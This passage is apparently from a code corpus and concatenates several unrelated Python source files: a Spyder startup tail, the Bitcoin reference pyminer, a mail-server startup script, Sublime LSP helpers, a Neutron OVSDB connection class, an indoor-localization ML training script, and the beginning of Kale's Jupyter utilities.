"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('main', 'icon_theme', 'spyder 2')
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occured
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 18302
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
start.py
|
#!/usr/bin/python3
import os
import glob
import multiprocessing
import logging as log
import sys
from podop import run_server
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
os.setuid(8)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/dovecot/§"
run_server(0, "dovecot", "/tmp/podop.socket", [
("quota", "url", url ),
("auth", "url", url),
("sieve", "url", url),
])
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_WEBUI_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_WEBUI", "antispam:11334")
for dovecot_file in glob.glob("/conf/*.conf"):
conf.jinja(dovecot_file, os.environ, os.path.join("/etc/dovecot", os.path.basename(dovecot_file)))
os.makedirs("/conf/bin", exist_ok=True)
for script_file in glob.glob("/conf/*.script"):
out_file = os.path.join("/conf/bin/", os.path.basename(script_file).replace('.script',''))
conf.jinja(script_file, os.environ, out_file)
os.chmod(out_file, 0o555)
# Run Podop, then postfix
multiprocessing.Process(target=start_podop).start()
os.system("chown mail:mail /mail")
os.system("chown -R mail:mail /var/lib/dovecot /conf")
os.execv("/usr/sbin/dovecot", ["dovecot", "-c", "/etc/dovecot/dovecot.conf", "-F"])
|
helpers.py
|
from LSP.plugin.core.typing import Any, Callable, List, Optional, Tuple
import re
import sublime
import subprocess
import threading
StringCallback = Callable[[str], None]
SemanticVersion = Tuple[int, int, int]
def run_command_sync(args: List[str], cwd: Optional[str] = None) -> Tuple[str, Optional[str]]:
"""
Runs the given command synchronously.
:returns: A two-element tuple with the returned value and an optional error. If running the command has failed, the
first tuple element will be empty string and the second will contain the potential `stderr` output. If the
command has succeeded then the second tuple element will be `None`.
"""
try:
output = subprocess.check_output(args, cwd=cwd, shell=sublime.platform() == 'windows', stderr=subprocess.STDOUT)
return (decode_bytes(output).strip(), None)
except subprocess.CalledProcessError as error:
return ('', decode_bytes(error.output).strip())
def run_command_async(args: List[str], on_success: StringCallback, on_error: StringCallback, **kwargs: Any) -> None:
"""
Runs the given command asynchronously.
On success calls the provided `on_success` callback with the value the the command has returned.
On error calls the provided `on_error` callback with the potential `stderr` output.
"""
def execute(on_success, on_error, args):
result, error = run_command_sync(args, **kwargs)
on_error(error) if error is not None else on_success(result)
thread = threading.Thread(target=execute, args=(on_success, on_error, args))
thread.start()
def decode_bytes(data: bytes) -> str:
"""
Decodes provided bytes using `utf-8` decoding, ignoring potential decoding errors.
"""
return data.decode('utf-8', 'ignore')
def parse_version(version: str) -> SemanticVersion:
"""
Converts a version string to a version tuple (major, minor, patch).
:returns: The semantic version in form of a 3-element tuple.
"""
match = re.match(r'v?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(?:-.+)?', version)
if match:
major, minor, patch = match.groups()
return int(major), int(minor), int(patch)
else:
return 0, 0, 0
def version_to_string(version: SemanticVersion) -> str:
"""
Returns a string representation of a version tuple.
"""
return '.'.join([str(c) for c in version])
def log_and_show_message(message: str, additional_logs: str = None, show_in_status: bool = True) -> None:
"""
Logs the message in the console and optionally sets it as a status message on the window.
:param message: The message to log or show in the status.
:param additional_logs: The extra value to log on a separate line.
:param show_in_status: Whether to briefly show the message in the status bar of the current window.
"""
print(message, '\n', additional_logs) if additional_logs else print(message)
if show_in_status:
sublime.active_window().status_message(message)
|
connection.py
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import threading
import traceback
from ovs.db import idl
from ovs import poller
import six
from six.moves import queue as Queue
import tenacity
from neutron.agent.ovsdb.native import helpers
from neutron.agent.ovsdb.native import idlutils
class TransactionQueue(Queue.Queue, object):
def __init__(self, *args, **kwargs):
super(TransactionQueue, self).__init__(*args, **kwargs)
alertpipe = os.pipe()
# NOTE(ivasilevskaya) python 3 doesn't allow unbuffered I/O. Will get
# around this constraint by using binary mode.
self.alertin = os.fdopen(alertpipe[0], 'rb', 0)
self.alertout = os.fdopen(alertpipe[1], 'wb', 0)
def get_nowait(self, *args, **kwargs):
try:
result = super(TransactionQueue, self).get_nowait(*args, **kwargs)
except Queue.Empty:
return None
self.alertin.read(1)
return result
def put(self, *args, **kwargs):
super(TransactionQueue, self).put(*args, **kwargs)
self.alertout.write(six.b('X'))
self.alertout.flush()
@property
def alert_fileno(self):
return self.alertin.fileno()
class Connection(object):
def __init__(self, connection, timeout, schema_name, idl_class=None):
self.idl = None
self.connection = connection
self.timeout = timeout
self.txns = TransactionQueue(1)
self.lock = threading.Lock()
self.schema_name = schema_name
self.idl_class = idl_class or idl.Idl
self._schema_filter = None
def start(self, table_name_list=None):
"""
:param table_name_list: A list of table names for schema_helper to
register. When this parameter is given, schema_helper will only
register tables which name are in list. Otherwise,
schema_helper will register all tables for given schema_name as
default.
"""
self._schema_filter = table_name_list
with self.lock:
if self.idl is not None:
return
helper = self.get_schema_helper()
self.update_schema_helper(helper)
self.idl = self.idl_class(self.connection, helper)
idlutils.wait_for_change(self.idl, self.timeout)
self.poller = poller.Poller()
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def get_schema_helper(self):
"""Retrieve the schema helper object from OVSDB"""
try:
helper = idlutils.get_schema_helper(self.connection,
self.schema_name)
except Exception:
# We may have failed do to set-manager not being called
helpers.enable_connection_uri(self.connection)
# There is a small window for a race, so retry up to a second
@tenacity.retry(wait=tenacity.wait_exponential(multiplier=0.01),
stop=tenacity.stop_after_delay(1),
reraise=True)
def do_get_schema_helper():
return idlutils.get_schema_helper(self.connection,
self.schema_name)
helper = do_get_schema_helper()
return helper
def update_schema_helper(self, helper):
if self._schema_filter:
for table_name in self._schema_filter:
helper.register_table(table_name)
else:
helper.register_all()
def run(self):
while True:
self.idl.wait(self.poller)
self.poller.fd_wait(self.txns.alert_fileno, poller.POLLIN)
#TODO(jlibosva): Remove next line once losing connection to ovsdb
# is solved.
self.poller.timer_wait(self.timeout * 1000)
self.poller.block()
self.idl.run()
txn = self.txns.get_nowait()
if txn is not None:
try:
txn.results.put(txn.do_commit())
except Exception as ex:
er = idlutils.ExceptionResult(ex=ex,
tb=traceback.format_exc())
txn.results.put(er)
self.txns.task_done()
def queue_txn(self, txn):
self.txns.put(txn)
|
learn1Huella.py
|
#!/usr/bin/python3
import io
import csv
import json
import warnings
import pickle
import operator
import time
import logging
import math
import functools
import numpy
from sklearn.preprocessing import MinMaxScaler
from threading import Thread
from random import shuffle
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn import cluster, mixture
from sklearn.neighbors import kneighbors_graph
from s3_helper import put_file, get_file
#Librerias locindoor
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from tensorflow.keras.models import load_model
from core.data_processor import DataLoader
from core.model import Model
from core.trajectories import Trajectories
from core.aps import Aps
# create logger with 'spam_application'
logger = logging.getLogger('learn')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('learn.log')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - [%(name)s/%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
def timeout(timeout):
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
res = [Exception('function [%s] timeout [%s seconds] exceeded!' % (
func.__name__, timeout))]
def newFunc():
try:
res[0] = func(*args, **kwargs)
except Exception as e:
res[0] = e
t = Thread(target=newFunc)
t.daemon = True
try:
t.start()
t.join(timeout)
except Exception as je:
raise je
ret = res[0]
if isinstance(ret, BaseException):
raise ret
return ret
return wrapper
return deco
class AI(object):
def __init__(self, family=None):
self.logger = logging.getLogger('learn.AI')
self.naming = {'from': {}, 'to': {}}
self.family = 'posifi'
def classify(self, sensor_data):
header = self.header[1:]
self.logger.debug(sensor_data)
is_unknown = True
lista_Ap = pd.read_csv("listadomodificado.csv")
#Filra los Ap detectados que no están en los Aps de entrenamiento
#for sensorType in sensor_data["s"]:
# csv_data = numpy.zeros((len(sensor_data["s"][sensorType]),len(header)))
# for i in range(len(sensor_data["s"][sensorType])-1):
# for sensor in (sensor_data["s"][sensorType][i]):
# sensorName = 'Ap200'
# for j in range (len(lista_Ap)):
# if (lista_Ap['MAC'][j] == sensor):
# sensorName = lista_Ap['nºAp'][j]
# if sensorName in header:
# is_unknown = False
# csv_data[i][header.index(sensorName)] = sensor_data["s"][sensorType][i][sensor]
csv_data = numpy.zeros(len(header))
for sensorType in sensor_data["s"]:
for sensor in (sensor_data["s"][sensorType]):
sensorName = 'Ap200'
for j in range (len(lista_Ap)):
if (lista_Ap['MAC'][j] == sensor):
sensorName = lista_Ap['nºAp'][j]
if sensorName in header:
is_unknown = False
csv_data[header.index(sensorName)] = sensor_data["s"][sensorType][sensor]
self.headerClassify = header
self.csv_dataClassify = csv_data.reshape(1, -1)
#self.csv_dataClassify = csv_data
payload = {'location_names': self.naming['to'], 'predictions': []}
threads = [None]*len(self.algorithms)
self.results = [None]*len(self.algorithms)
for i, alg in enumerate(self.algorithms.keys()):
threads[i] = Thread(target=self.do_classification, args=(i, alg))
threads[i].start()
for i, _ in enumerate(self.algorithms.keys()):
threads[i].join()
for result in self.results:
if result != None:
payload['predictions'].append(result)
payload['is_unknown'] = is_unknown
return payload
def do_classification(self, index, name):
t = time.time()
#pasos = np.empty([15,self.csv_dataClassify.shape[1]])
try:
if name == "LSTM":
# for h in range(self.csv_dataClassify.shape[0]):
# self.csv_dataClassify[h][self.csv_dataClassify[h] == 0] = 100
# huella = self.csv_dataClassify[h]
# huella = huella.reshape(36,1)
# min_max_scaler = MinMaxScaler()
# x_scaled = min_max_scaler.fit_transform(huella)
# huella = x_scaled.reshape(1,36)
# pasos[h] = huella
# if pasos.shape == 15:
# pasos = pasos.reshape(1,15,36)
# model_new= load_model('learnfull.h5')
# prediction = model_new.predict(pasos)
# else:
# aux = pasos[0]
# for i in range(15):
# pasos[i]=aux
# pasos = pasos.reshape(1,15,36)
# model_new= load_model('learnfull.h5')
# prediction = model_new.predict(pasos)
self.csv_dataClassify[self.csv_dataClassify == 0] = 100
huella = self.csv_dataClassify
huella = huella.reshape(huella.shape[1],1)
min_max_scaler = MinMaxScaler()
x_scaled = min_max_scaler.fit_transform(huella)
pasos = np.empty([15,huella.shape[0]])
huella = x_scaled.reshape(1,36)
for i in range(15):
pasos[i] = huella
pasos = pasos.reshape(1,15,36)
model_new= load_model('learnfull.h5')
prediction = model_new.predict(pasos)
self.logger.debug(prediction)
else:
prediction = self.algorithms[name].predict_proba(self.csv_dataClassify)
except Exception as e:
logger.error(self.csv_dataClassify)
logger.error(str(e))
return
predict = {}
if name == "LSTM":
a = np.int(prediction[0][14])
prediction = np.zeros([1,90])
for i in range(90):
if (a == i):
prediction[0,i] = 100
for i, pred in enumerate(prediction[0]):
predict[i] = pred
predict_payload = {'name': name,'locations': [], 'probabilities': []}
badValue = False
for tup in sorted(predict.items(), key=operator.itemgetter(1), reverse=True):
predict_payload['locations'].append(str(tup[0]))
predict_payload['probabilities'].append(round(float(tup[1]), 2))
if math.isnan(tup[1]):
badValue = True
break
if badValue:
return
self.results[index] = predict_payload
@timeout(10)
def train(self, clf, x, y):
return clf.fit(x, y)
def trayecto(self, fname): #Generar los trayectos
configs = json.load(open('config.json', 'r'))
#Clase Ap - lee el archivo de MAC de los Aps y se genera un listado
Ap = Aps(os.path.join('data', configs['Aps']['listaAps']))
lista_Aps = Ap.listadoF2(configs)
#Litar Aps de Antel
lista_antel = Ap.Aps_antel(lista_Aps,os.path.join('data',configs['Aps']['listaAntel']))
#Listar Aps de Fing
lista_Fing = Ap.Aps_fing(lista_Aps,os.path.join('data',configs['Aps']['listaFing']))
# Se cargan los datos y se procesan
data = DataLoader(fname)
# en datos se cargan la matriz de huellas recolectadas - según el tipo de matriz que queramos - se especifica en config
datos = data.huellas(configs, lista_antel, lista_Aps)
#Filtrado de columnas con poca información
datos = data.filtro_Ap(datos, configs['Aps']['descartamos'],-85)
# cargamos los datos con una huella aleatoria por zona
datos_una_huella = data.una_huella_zona(datos)
#Normalizamos los datos RSSI (Las zonas quedan con nùmero de zona)
huellas_norm_df = data.normaliza(datos_una_huella)
datos.to_csv('datos.csv', index=False)
# Se genera Trayectorias_aleatorias que es un matriz que cada fila corresponde a una trayectoria de T pasos
# La cantidad de trayectorias que queremos generar y los pasos se pasan como parametro
trayectorias = Trajectories(configs)
mapa = trayectorias.crear_mapa(configs)
Trayectorias_aleatorias = trayectorias.generacion_trayectorias(configs['trajectory']['T'],configs['trajectory']['cantidad'],mapa)
#Se genera una matriz de 3D donde a cada paso de la trayectoria le corresponde una función de huellas
Matriz_Trayectorias_una_huella = trayectorias.trayectorias_con_una_huella(huellas_norm_df,Trayectorias_aleatorias)
data_train, data_test = trayectorias.train_and_test(Matriz_Trayectorias_una_huella,configs['data']['train_test_split'])
train3D_X, train3D_y = data_train[:,:,:-1], data_train[:,:, -1]
test3D_X, test3D_y = data_test[:,:,:-1], data_test[:,:, -1]
#trainY_coord3D = data.coordenadas(train3D_y)
#testY_coord3D = data.coordenadas(test3D_y)
return train3D_X, test3D_X, train3D_y, test3D_y
def learn(self, fname):
self.model = Model()
t = time.time()
configs = json.load(open('config.json', 'r'))
#Cargo el archivo que contiene las huellas para clasificar
fname = "HuellasPiso1.csv"
#genero las trayectoiras y lo separo en train y test
train3D_X, test3D_X, train3D_y, test3Y_y = self.trayecto(fname)
self.header = []
rows = []
naming_num = 0
with open('../src/datos.csv', 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for i, row in enumerate(reader):
#self.logger.debug(row)
if i == 0:
self.header = row
else:
for j, val in enumerate(row):
if j == 36:
# this is a name of the location
if val not in self.naming['from']:
self.naming['from'][val] = naming_num
valor = str(int(float(val)))
#self.naming['to'][naming_num] = "location" + "_" + valor
self.naming['to'][naming_num] = valor
naming_num += 1
row[j] = self.naming['from'][val]
continue
if val == '':
row[j] = 0
continue
try:
row[j] = float(val)
except:
self.logger.error(
"problem parsing value " + str(val))
rows.append(row)
# first column in row is the classification, Y
y = numpy.zeros(len(rows))
x = numpy.zeros((len(rows), len(rows[0]) - 1))
# shuffle it up for training
record_range = list(range(len(rows)))
shuffle(record_range)
for i in record_range:
y[i] = rows[i][0]
x[i, :] = numpy.array(rows[i][1:])
names = [
"LSTM"]
#"Linear SVM"]
classifiers = [
self.model.model_clas(configs)]
#SVC(kernel="linear", C=0.025, probability=True)]
self.algorithms = {}
for name, clf in zip(names, classifiers):
t2 = time.time()
self.logger.debug("learning {}".format(name))
try:
if name == "LSTM":
self.algorithms[name] = self.model.train(train3D_X, train3D_y,epochs = 5,batch_size = 10,verbose=2,shuffle=True)
self.model.save()
else:
self.algorithms[name] = self.train(clf, x, y)
# self.logger.debug("learned {}, {:d} ms".format(name, int(1000 * (t2 - time.time()))))
except Exception as e:
self.logger.error("{} {}".format(name, str(e)))
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def save(self, save_file):
t = time.time()
save_data = {
'header': self.header,
'naming': self.naming,
'algorithms': self.algorithms,
'family': self.family
}
save_data = pickle.dumps(save_data)
put_file(f'ai_metadata/{save_file}', save_data)
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def load(self, save_file):
t = time.time()
downloaded_data = get_file(f'ai_metadata/{save_file}')
if not downloaded_data:
raise Exception('There is no AI data on S3')
saved_data = pickle.loads(downloaded_data)
self.header = saved_data['header']
self.naming = saved_data['naming']
self.algorithms = saved_data['algorithms']
self.family = saved_data['family']
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def do():
ai = AI()
ai.load()
# ai.learn()
params = {'quantile': .3,
'eps': .3,
'damping': .9,
'preference': -200,
'n_neighbors': 10,
'n_clusters': 3}
bandwidth = cluster.estimate_bandwidth(ai.x, quantile=params['quantile'])
connectivity = kneighbors_graph(
ai.x, n_neighbors=params['n_neighbors'], include_self=False)
# make connectivity symmetric
connectivity = 0.5 * (connectivity + connectivity.T)
ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
two_means = cluster.MiniBatchKMeans(n_clusters=params['n_clusters'])
ward = cluster.AgglomerativeClustering(
n_clusters=params['n_clusters'], linkage='ward',
connectivity=connectivity)
spectral = cluster.SpectralClustering(
n_clusters=params['n_clusters'], eigen_solver='arpack',
affinity="nearest_neighbors")
dbscan = cluster.DBSCAN(eps=params['eps'])
affinity_propagation = cluster.AffinityPropagation(
damping=params['damping'], preference=params['preference'])
average_linkage = cluster.AgglomerativeClustering(
linkage="average", affinity="cityblock",
n_clusters=params['n_clusters'], connectivity=connectivity)
birch = cluster.Birch(n_clusters=params['n_clusters'])
gmm = mixture.GaussianMixture(
n_components=params['n_clusters'], covariance_type='full')
clustering_algorithms = (
('MiniBatchKMeans', two_means),
('AffinityPropagation', affinity_propagation),
('MeanShift', ms),
('SpectralClustering', spectral),
('Ward', ward),
('AgglomerativeClustering', average_linkage),
('DBSCAN', dbscan),
('Birch', birch),
('GaussianMixture', gmm)
)
for name, algorithm in clustering_algorithms:
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore",
message="the number of connected components of the " +
"connectivity matrix is [0-9]{1,2}" +
" > 1. Completing it to avoid stopping the tree early.",
category=UserWarning)
warnings.filterwarnings(
"ignore",
message="Graph is not fully connected, spectral embedding" +
" may not work as expected.",
category=UserWarning)
try:
algorithm.fit(ai.x)
except Exception as e:
continue
if hasattr(algorithm, 'labels_'):
y_pred = algorithm.labels_.astype(numpy.int)
else:
y_pred = algorithm.predict(ai.x)
if max(y_pred) > 3:
continue
known_groups = {}
for i, group in enumerate(ai.y):
group = int(group)
if group not in known_groups:
known_groups[group] = []
known_groups[group].append(i)
guessed_groups = {}
for i, group in enumerate(y_pred):
if group not in guessed_groups:
guessed_groups[group] = []
guessed_groups[group].append(i)
for k in known_groups:
for g in guessed_groups:
print(
k, g, len(set(known_groups[k]).intersection(guessed_groups[g])))
|
jupyter_utils.py
|
# Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import json
import time
import signal
import nbformat
import threading
from queue import Empty
from kale.utils import pod_utils
from jupyter_client.kernelspec import get_kernel_spec
from kale.utils.utils import remove_ansi_color_sequences
from nbconvert.preprocessors.execute import ExecutePreprocessor
from packaging import version as pkg_version
html_template = '''
<html><head>
<style>
table {
border: none;
border-collapse: collapse;
border-spacing: 0;
font-size: 14px;
}
td,
th {
text-align: right;
vertical-align: middle;
padding: 0.5em 0.5em;
line-height: 1.0;
white-space: nowrap;
max-width: 100px;
text-overflow: ellipsis;
overflow: hidden;
border: none;
}
th {
font-weight: bold;
}
tbody tr:nth-child(odd) {
background: rgb(245, 245, 245);
}
</style>
</head>
<body><div>
%s
</div></body>
</html>
'''
image_html_template = '''
<div>
<p>{}</p>
<img src="data:image/png;base64, {}" />
</div>
'''
text_html_template = '''
<pre>
------- CELL OUTPUT -------
{}
---------------------------
</pre>
<br><br>
'''
javascript_html_template = '''
<script>
{}
</script>
'''
class KaleKernelException(Exception):
"""Raised when signal_handler receives a signal from capture_streams."""
pass
def generate_html_output(outputs):
"""Transform a notebook cell rich outputs into a html page.
Args:
outputs: notebook cell output
Returns: html multiline string
"""
if not isinstance(outputs, list):
raise ValueError("A notebook's cell outputs must be a valid list."
" Found {} instead.".format(type(outputs)))
html_body = ""
# run through the list of outputs
for o in outputs:
# the only rich outputs should come from `display_data` and
# `execution_result` messages. The latter are identical to
# `display_data` messages, with the addition of an execution_count key.
output_type = o.get('output_type', None)
if not output_type:
raise ValueError("Cell output dict has not `output_type` field."
" Output: {}".format(o))
if o['output_type'] in ['display_data', 'execute_result']:
# check mime-type of content
# Currently supported MIME types:
# see: https://ipython.org/ipython-doc/2/api/generated/IPython.core.displaypub.html#IPython.core.displaypub.DisplayPublisher
# text / plain
# text / html
# text / markdown
# text / latex
# application / json
# application / javascript
# image / png
# image / jpeg
# image / svg + xml
data = o['data']
# TODO: Generalize to multiple image types (i.e. jpeg and svg+xml)
if 'image/png' in data:
title = data.get('text/plain', '')
html = image_html_template.format(title, data['image/png'])
html_body += html
if 'text/html' in data:
html_body += data['text/html']
if ('image/png' not in data
and 'text/html' not in data
and 'text/plain' in data):
html_body += text_html_template.format(data['text/plain'])
if 'application/javascript' in data:
html_body += javascript_html_template.format(
data['application/javascript'])
return html_body
def update_uimetadata(artifact_name,
uimetadata_path='/mlpipeline-ui-metadata.json'):
"""Update ui-metadata dictionary with a new web-app entry.
Args:
artifact_name: Name of the artifact
uimetadata_path: path to mlpipeline-ui-metadata.json
"""
# Default empty ui-metadata dict
outputs = {"outputs": []}
if os.path.exists(uimetadata_path):
try:
outputs = json.loads(
open(uimetadata_path, 'r').read())
if not outputs.get('outputs', None):
outputs['outputs'] = []
except json.JSONDecodeError as e:
print("Failed to parse json file {}: {}\n"
"This step will not be able to visualize artifacts in the"
" KFP UI".format(uimetadata_path, e))
pod_name = pod_utils.get_pod_name()
namespace = pod_utils.get_namespace()
workflow_name = pod_utils.get_workflow_name(pod_name, namespace)
html_artifact_entry = [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/{}/{}/{}'.format(
workflow_name, pod_name, artifact_name + '.tgz')
}]
outputs['outputs'] += html_artifact_entry
with open(uimetadata_path, "w") as f:
json.dump(outputs, f)
def process_outputs(cells):
"""Process a list of cells outputs after execution."""
html_outputs = [generate_html_output(c.outputs)
for c in cells]
html_outputs = '\n'.join(html_outputs).strip()
if html_outputs == "":
html_outputs = "This step did not produce any artifacts."
html_artifact = html_template % html_outputs
return html_artifact
def capture_streams(kc, exit_on_error=False):
"""Capture stream and error outputs from a kernel connection.
Get messages from the iopub channel of the `kc` kernel connection
and write to stdout or stderr any message of type `stream`.
Capture and exit when receiving an `error` message or when the message
queue is done.
Args:
kc: kernel connection
exit_on_error (bool): True to call sys.exit() when the kernel sends
an error message.
"""
while True:
try:
msg = kc.iopub_channel.get_msg()
except Empty:
print("The Kale kernel stream watcher thread raised an Empty"
" exception, exiting...")
return
msg_type = msg['header']['msg_type']
content = msg['content']
if msg_type == 'stream': # stdout or stderr
if content['name'] == 'stdout':
sys.stdout.write(content['text'])
elif content['name'] == 'stderr':
sys.stderr.write(content['text'])
else:
raise NotImplementedError("stream message content name not"
" recognized: {}"
.format(content['name']))
if msg_type == 'error': # error and exceptions
# traceback is a list of strings (jupyter protocol spec)
